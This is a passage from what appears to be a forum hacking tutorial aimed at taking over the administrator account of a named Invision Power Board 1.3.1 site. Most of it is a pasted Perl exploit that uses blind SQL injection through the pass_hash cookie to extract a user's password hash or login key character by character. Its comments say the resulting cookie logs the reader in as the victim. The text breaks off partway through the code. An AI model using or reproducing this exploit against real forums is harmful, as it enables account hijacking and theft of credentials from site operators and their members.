Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2". Now we need a nice exploit. For 1.3.1 forums, I prefer to use one that is in common circulation around these forums. For those who don't have it, here: CODE#!/usr/bin/perl -w################################################################### This one actually works :) Just paste the outputted cookie into# your request header using livehttpheaders or something and you# will probably be logged in as that user. No need to decrypt it!# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com###############...###########use LWP::UserAgent;$ua = new LWP::UserAgent;$ua->agent("Mosiac 1.0" . $ua->agent);if (!$ARGV[0]) {$ARGV[0] = '';}if (!$ARGV[3]) {$ARGV[3] = '';}my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';my $user = $ARGV[1]; # userid to jack my $iver = $ARGV[2]; # version 1 or 2my $cpre = $ARGV[3]; # cookie prefixmy $dbug = $ARGV[4]; # debug?if (!$ARGV[2]){print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";exit;}my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");my $outputs = '';for( $i=1; $i < 33; $i++ ){for( $j=0; $j < 16; $j++ ){my $current = $charset[$j];my $sql = ( $iver < 2 ) ?"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);my $res = $ua->get($path, @cookie);# If we get a valid sql request then this# does not appear anywhere in the sources$pattern = '';$_ = $res->content;if ($dbug) { print };if ( !(/$pattern/) )